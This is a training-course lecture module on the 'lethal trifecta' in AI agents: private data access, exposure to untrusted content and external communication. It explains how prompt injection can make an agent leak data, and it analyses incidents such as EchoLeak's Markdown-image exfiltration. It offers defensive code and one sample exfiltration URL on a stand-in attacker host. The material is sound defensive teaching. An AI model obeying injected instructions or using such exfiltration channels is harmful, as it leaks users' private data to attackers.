Module 3.6 — The Lethal Trifecta

50-minute lecture · Day 3 afternoon · Closes Day 3, lab follows

Learning objectives

By the end of this module, students can:

  1. State the three legs of Simon Willison’s “lethal trifecta”: access to private data, exposure to untrusted content, and the ability to externally communicate
  2. Audit any LLM-touching system against the trifecta, identifying which legs it satisfies
  3. Apply at least three architectural patterns that break a leg of the trifecta, eliminating the class of vulnerability rather than just patching specific instances
  4. Use the trifecta lens to interpret recent incidents (the EchoLeak CVE, GTG-1002, and the broader EchoLeak class) as instances of the same root cause

The framing

Simon Willison published “The lethal trifecta for AI agents: private data, untrusted content, and external communication” on June 16, 2025. The framing identifies a structural vulnerability pattern in AI agent design:

If your agent combines these three features — access to private data, exposure to untrusted content, and the ability to externally communicate — an attacker can easily trick it into accessing your private data and sending it to that attacker.

The three legs:

  1. Access to private data: your emails, internal documents, databases, customer records, anything the LLM can read on your behalf. Providing this access is one of the most common purposes of tools in the first place; it is why people deploy enterprise copilots.

  2. Exposure to untrusted content: any mechanism by which text (or images, video, audio) controlled by an attacker could become available to your LLM. Examples include a web page, an incoming email, a third-party document, a public Slack channel, or a customer support ticket.

  3. Ability to externally communicate: any path for the LLM to send data outward. Examples include direct API calls, sending emails, rendering Markdown links or images (the EchoLeak exfil path), posting to message queues, and updating a public dashboard.

The lethal property: when an agent simultaneously has all three, an attacker placing crafted content in the “untrusted content” surface can trick the agent into reading “private data” and sending it through the “external communication” channel — without the user ever knowing.

Source (canonical): simonwillison.net/2025/Jun/16/the-lethal-trifecta/


Why this framing matters

Detection engineering is often a long list of specific patterns: catch this jailbreak string, block this CVE, alert on that signature. The trifecta is architectural — it lets you reason about a class of vulnerabilities and design systems that don’t satisfy all three legs simultaneously.

The trifecta lens explains, in one frame:

The detection engineer’s value-add: instead of patching one vulnerability after another, audit your LLM-touching systems against the trifecta and decompose the ones that satisfy all three legs.


The trifecta audit pattern

For every LLM-touching system in your org, walk through the three legs:

| System | Private data access? | Untrusted content exposure? | External communication? | All three? |
|---|---|---|---|---|
| M365 Copilot | ✓ Outlook, OneDrive, SharePoint | ✓ Inbound email content | ✓ Markdown links/images via Teams proxy | YES (fix needed) |
| Internal RAG chatbot (knowledge base only) | ✓ Internal KB | ? Depends on KB content provenance | ? Depends on action capabilities | Maybe |
| Customer-facing support bot | ✓ Customer-specific data via session | ✓ Customer inputs | ✓ Returns responses to customer | YES (fix needed) |
| GitHub Copilot in dev IDE | ✓ Local code | ✓ Files opened in IDE | ✗ No external comms beyond Microsoft API | NO (only two legs) |
| Slack AI summarizing channel | ✓ Channel history | ✓ Any external user’s message | ✓ Posts summary back to channel | YES (fix needed) |
| Image-generation tool | ✗ No private data | ✓ User prompt | ✓ Generates image | NO (only two legs) |
| Slackbot that auto-replies to mentions | ✓ Workspace content | ✓ Mentioner’s message | ✓ Replies in channel | YES (fix needed) |

A system flagged with three checkmarks is a trifecta-positive system. Trifecta-positive systems are the priority list for the SOC’s defensive architecture review.

The exercise to run with students: have them map the trifecta against their own org’s LLM-touching systems. Most teams discover 3-5 trifecta-positive systems they hadn’t recognized as a coherent risk class.
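
A minimal sketch of how the audit table could be captured in code so the priority list is derived rather than hand-maintained. The class name `SystemAudit`, the `verdict` labels, and the use of `None` for a "depends" cell are assumptions made for illustration, not part of Willison's framing.

```python
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class SystemAudit:
    """One row of the trifecta audit. None means 'depends / not yet determined'."""
    name: str
    private_data: Optional[bool]
    untrusted_content: Optional[bool]
    external_comm: Optional[bool]

    def verdict(self) -> str:
        legs = (self.private_data, self.untrusted_content, self.external_comm)
        if any(leg is False for leg in legs):
            return "NO"      # at least one leg is definitely absent
        if all(leg is True for leg in legs):
            return "YES"     # trifecta-positive
        return "MAYBE"       # no leg ruled out, at least one still unknown


def priority_list(audits: List[SystemAudit]) -> List[str]:
    """Names of trifecta-positive systems, in audit order."""
    return [a.name for a in audits if a.verdict() == "YES"]


# Three rows taken from the table above.
audits = [
    SystemAudit("M365 Copilot", True, True, True),
    SystemAudit("Internal RAG chatbot", True, None, None),
    SystemAudit("Image-generation tool", False, True, True),
]
print(priority_list(audits))
```

Treating an unknown leg as "MAYBE" rather than "NO" keeps unresolved systems on the review list until someone confirms a leg is actually absent.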


Architectural patterns that break a leg

When a system is trifecta-positive, the goal is to break at least one leg so the class of vulnerability is eliminated. Three viable patterns:

Pattern 1: Break the External Communication leg

The most common viable decomposition. Run the agent in a sandboxed, network-isolated environment where all outbound traffic is either disabled or restricted to an allowlist of destinations an attacker cannot control.

Examples:
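
One hypothetical illustration is a destination check placed in front of every outbound request the agent's tools can make. This is a sketch only: the host names in `ALLOWED_HOSTS` and the function name `egress_allowed` are invented for this example, and a real deployment would also enforce the same policy at the network layer rather than trusting application code alone.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist: destinations the organization fully controls.
ALLOWED_HOSTS = frozenset({"api.internal.example", "tickets.internal.example"})


def egress_allowed(url: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only for https URLs whose exact host is on the allowlist."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False  # malformed URL: fail closed
    if parts.scheme != "https":
        return False
    # .hostname drops any userinfo and port, so
    # "https://api.internal.example@attacker.test/" resolves to attacker.test.
    host = (parts.hostname or "").lower()
    # Exact match, not suffix match, so look-alike subdomains are rejected.
    return host in allowed_hosts
```

Exact host matching is deliberate: a suffix or substring check would accept `api.internal.example.attacker.test`.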

Pattern 2: Break the Untrusted Content leg

Ensure the agent only sees content that has been verified as trusted before it reaches the LLM’s context. Concretely:
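
One way to sketch such a gate, under the assumption that every piece of content carries a source label assigned by the ingestion pipeline (not by the content itself). The labels in `TRUSTED_SOURCES` and the names `ContextItem` and `build_context` are hypothetical.

```python
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Hypothetical source labels that have passed an out-of-band review.
TRUSTED_SOURCES = frozenset({"curated_kb", "signed_policy_docs"})


@dataclass(frozen=True)
class ContextItem:
    source: str   # set by the ingestion pipeline, never parsed from the text
    text: str


def build_context(
    items: Iterable[ContextItem], trusted_sources=TRUSTED_SOURCES
) -> Tuple[List[ContextItem], List[ContextItem]]:
    """Split items into (admitted, quarantined) by source label."""
    admitted: List[ContextItem] = []
    quarantined: List[ContextItem] = []
    for item in items:
        if item.source in trusted_sources:
            admitted.append(item)
        else:
            quarantined.append(item)  # never reaches the LLM context
    return admitted, quarantined
```

Only the `admitted` list would be passed to the model. Quarantined items can still be logged or reviewed by a human, which keeps the leg broken without silently discarding data.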

Pattern 3: Break the Private Data Access leg

Reduce the agent’s read scope to the absolute minimum. The agent can’t exfiltrate what it can’t access.
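
A minimal sketch of read-scope reduction, assuming documents carry an owner and a sensitivity label. The names `Document`, `ReadScope`, and `scoped_read`, and the label values used in the usage lines, are hypothetical.

```python
from dataclasses import dataclass
from typing import FrozenSet, Iterable, List


@dataclass(frozen=True)
class Document:
    doc_id: str
    owner: str
    label: str   # hypothetical sensitivity label, e.g. "public" or "restricted"
    text: str


@dataclass(frozen=True)
class ReadScope:
    user: str
    allowed_labels: FrozenSet[str]


def scoped_read(docs: Iterable[Document], scope: ReadScope) -> List[Document]:
    """Return only documents the current task is permitted to read."""
    return [
        d for d in docs
        if d.owner == scope.user and d.label in scope.allowed_labels
    ]


docs = [
    Document("d1", "alice", "public", "Team lunch menu"),
    Document("d2", "alice", "restricted", "Salary review"),
    Document("d3", "bob", "public", "Bob's notes"),
]
scope = ReadScope(user="alice", allowed_labels=frozenset({"public"}))
print([d.doc_id for d in scoped_read(docs, scope)])
```

The filter runs before retrieval results reach the model, so out-of-scope documents are never in the context to begin with.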

Meta’s framing: the “Agents Rule of Two”

A defensive heuristic increasingly cited in 2025-2026 enterprise-AI guidance: any AI agent should satisfy at most two legs of the trifecta. If an agent reads private data and processes untrusted content, it should not externally communicate. If an agent reads private data and externally communicates, it should not see untrusted content. If an agent processes untrusted content and externally communicates, it should not read private data.

Instructor note: the name “Agents Rule of Two” comes from a Meta AI post published in late October 2025, not from Anthropic. Verify the source document and its exact wording before citing in delivery. The principle is widely held; the exact phrasing varies by vendor.
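
The Rule of Two can also be enforced at runtime rather than only at design time. The sketch below assumes a per-session guard that every tool call passes through; the names `Leg`, `SessionGuard`, and `RuleOfTwoViolation` are hypothetical, and scoping the check to a session is an assumption of this example.

```python
from enum import Enum


class Leg(Enum):
    PRIVATE_DATA = "private_data"
    UNTRUSTED_CONTENT = "untrusted_content"
    EXTERNAL_COMM = "external_comm"


class RuleOfTwoViolation(Exception):
    """Raised when a session would acquire its third trifecta leg."""


class SessionGuard:
    """Tracks which legs a session has used and refuses the third."""

    def __init__(self) -> None:
        self.used = set()

    def request(self, leg: Leg) -> None:
        # Re-using a leg already held is always fine.
        if leg not in self.used and len(self.used) >= 2:
            raise RuleOfTwoViolation(
                f"session already holds two legs; refusing {leg.value}"
            )
        self.used.add(leg)


guard = SessionGuard()
guard.request(Leg.PRIVATE_DATA)        # e.g. read the user's mailbox
guard.request(Leg.UNTRUSTED_CONTENT)   # e.g. ingest an inbound email body
try:
    guard.request(Leg.EXTERNAL_COMM)   # e.g. send an outbound message
except RuleOfTwoViolation as exc:
    print("blocked:", exc)
```

In practice the refusal would typically route to human approval or a fresh session rather than a hard failure, which is one way to frame the trade-off with stakeholders.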


Recent incidents through the trifecta lens

EchoLeak (CVE-2025-32711, M365 Copilot)

The fix Microsoft shipped (June 2025) disrupted the Markdown-image-rendering exfiltration path, which broke the External Communication leg for that specific channel. Trifecta-positive status is removed for that one attack path only. The system remains trifecta-positive with respect to any exfiltration channel not yet discovered, which is why the EchoLeak class is more important than the specific CVE.
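
To make the "specific channel" point concrete, here is a sketch of an output filter that removes inline Markdown images pointing at hosts outside an allowlist. It is not a description of Microsoft's fix. The host in `ALLOWED_IMAGE_HOSTS` and the function name are hypothetical, and the regular expression only covers inline images; reference-style images and plain links are not handled and would need a real Markdown parser.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts that may serve images in rendered output.
ALLOWED_IMAGE_HOSTS = frozenset({"assets.internal.example"})

# Inline Markdown image: ![alt](url "optional title")
INLINE_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)')


def strip_untrusted_images(markdown: str, allowed_hosts=ALLOWED_IMAGE_HOSTS) -> str:
    """Replace inline images on non-allowlisted hosts with a text placeholder."""

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        try:
            host = (urlsplit(url).hostname or "").lower()
        except ValueError:
            host = ""  # malformed URL: treat as untrusted
        if host in allowed_hosts:
            return match.group(0)
        # Drop the URL entirely so the client never fetches it.
        return f"[image removed: {alt}]"

    return INLINE_IMAGE.sub(replace, markdown)


print(strip_untrusted_images(
    "Summary ![chart](https://attacker.test/p.png?d=SECRET) done"
))
```

The limitation is the lesson: a filter like this closes one rendering path, while any other channel that causes an outbound fetch stays open.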

GTG-1002 (Anthropic Nov 2025, Claude Code agent)

Anthropic’s response was to detect and disrupt specific operator accounts, not to architecturally decompose Claude Code. The vulnerability class remains — the next adversary will use different operator credentials and different role-play framing. The trifecta is unbroken.

CopilotHunter exposing thousands of bots (Bargury BHUSA 2024)

Bargury’s research found enterprise Copilot deployments exposed externally: bots with private-data access and external communication capability that anyone could send untrusted content to. Each exposed bot was a trifecta-positive system. The “fix” (restricting external access) did not remove the Untrusted Content leg entirely. It closed that leg to the general internet and narrowed it to specific authenticated users.


The detection engineer’s role

For trifecta-positive systems that cannot be architecturally decomposed (because the business value depends on the agent having all three properties), the SOC’s role is to:

  1. Layer detection across all three legs:
    • Pre-LLM screening for untrusted content (Module 3.4 detector + Module 3.5 guardrails)
    • Monitoring on private-data access patterns — alert on unusual scope, volume, or content categories
    • Egress monitoring on external communication — detect data-shaped outputs, unusual destinations
  2. Build canary tokens: high-entropy strings in the private-data store that should never appear in outputs. Any appearance is evidence of a breach.
  3. Classify output-side data: every LLM response is scanned for sensitive content markers before delivery; sensitive content in unexpected contexts triggers human-in-the-loop (HITL) review.
  4. Track provenance: every byte of content that influenced an LLM output is tagged with its source, so after-the-fact investigation can trace exfiltration paths.

These controls don’t break a trifecta leg — they make exploitation noisy enough to detect. Detection is the fallback when architectural decomposition isn’t viable.
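
As an illustration of the canary-token control, the sketch below generates a high-entropy marker and scans model output for it before delivery. The function names and the `CANARY` prefix are hypothetical. Note the stated limitation: a plain substring scan will miss a canary that the model has been induced to encode (for example as base64), so it complements egress monitoring rather than replacing it.

```python
import secrets
from typing import Iterable, List


def new_canary(prefix: str = "CANARY") -> str:
    """Create a high-entropy marker to plant in the private-data store."""
    return f"{prefix}-{secrets.token_hex(16)}"   # 128 bits of randomness


def find_canaries(output: str, canaries: Iterable[str]) -> List[str]:
    """Return every planted canary that appears in the model output."""
    lowered = output.lower()
    # Case-insensitive match, since a model may change letter case.
    return [c for c in canaries if c.lower() in lowered]


canary = new_canary()
leaked = find_canaries(f"Here is the file: {canary.upper()}", [canary])
if leaked:
    print("ALERT: canary observed in output")
```

Any non-empty result from `find_canaries` would block delivery and open an incident, since a planted token has no legitimate reason to appear in a response.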


Discussion questions (~10 min)

  1. Run the trifecta audit against your org’s existing LLM-touching systems. Which systems are trifecta-positive? For each, which leg is most economically viable to break? Which would require business approval to decompose?
  2. EchoLeak was fixed by breaking the Markdown-image-rendering exfiltration path. Is that the same as breaking the External Communication leg? What other communication channels remain? Is the M365 Copilot deployment still trifecta-positive?
  3. The “Rule of Two” heuristic says any AI agent should satisfy at most two legs. Your CISO objects: “but an agent that can read data, act on the world, and process external input is the whole point; that’s the use case.” How do you frame the trade-off?

Common mistakes

| Mistake | Better approach |
|---|---|
| Patching specific vulnerabilities without addressing the architecture | The trifecta lens explains why specific patches don’t generalize: class-of-vulnerability thinking |
| Auditing only the “top-tier” LLM deployments | Slack AI, internal Teams plugins, low-code agent builders often trip the trifecta without being on the SOC’s radar |
| Assuming “internal only” means trusted content | Internal content sources can still ingest untrusted content (user-submitted tickets, document uploads, third-party API responses) |
| Treating External Communication as “obviously needed” | Many LLM use cases don’t actually require external communication; assess before assuming |
| Stopping at one architectural fix | If the system is trifecta-positive, address all three legs across detection + architecture |

Closing Day 3

Day 3 has covered:

The architectural insight running through Day 3: the enterprise’s LLM-touching systems are themselves an attack surface. The trust boundary is no longer at the network perimeter — it’s inside the application, where untrusted content gets processed by privileged LLMs. The detection engineer’s controls must operate at that boundary.

Day 4 takes this further into agentic adversaries — the GTG-1002 class of attack — and AI supply-chain compromise. Day 5 is the capstone where students defend Verdancy Health against a multi-stage AI-orchestrated attack that includes EchoLeak-class prompt injection in Stage 3.